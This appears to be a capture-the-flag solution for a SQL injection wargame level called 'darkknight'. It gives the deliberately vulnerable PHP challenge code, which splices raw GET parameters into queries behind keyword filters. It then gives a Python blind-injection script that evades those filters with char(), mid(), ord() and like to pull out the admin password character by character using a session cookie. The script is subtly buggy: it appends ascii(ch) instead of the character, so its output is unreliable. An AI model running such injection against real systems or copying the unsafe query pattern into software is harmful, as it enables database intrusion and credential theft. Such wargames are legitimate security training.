Hello {$result[id]}

Hello {$result[id]}

Hello {$result[id]}

DARKKNIGHT Clear!

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\\'/i', $_GET[pw])) exit("HeHe"); 
  if(preg_match('/\\'|substr|ascii|=/i', $_GET[no])) exit("HeHe"); 
  $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
  highlight_file(__FILE__); 
?>

#!/usr/bin/env python
# -*- coding: utf8 -*-

import requests

headers = {'Cookie': 'PHPSESSID=e4l542pq9kop3u2i2st5ldtlrm;'}
url = "<https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php>"
string = "1234567890abcdefghijklmnopqrstuvwxyz"

pw= ""

for i in range(1, 9):
    for ch in range(48, 123):
        if 58 <= ch <= 64: continue
        if 91 <= ch <= 96: continue
        query = "?pw=&no=1 or id like char(97,100,109,105,110) and ord(mid(pw,"+str(i)+",1)) like "+str(ch)+"%23 "
        r = requests.get(url + query, headers=headers)
        if r.text.find('Hello admin') != -1:
            pw = pw + ascii(ch)
            break

    print ("passwd : ", pw)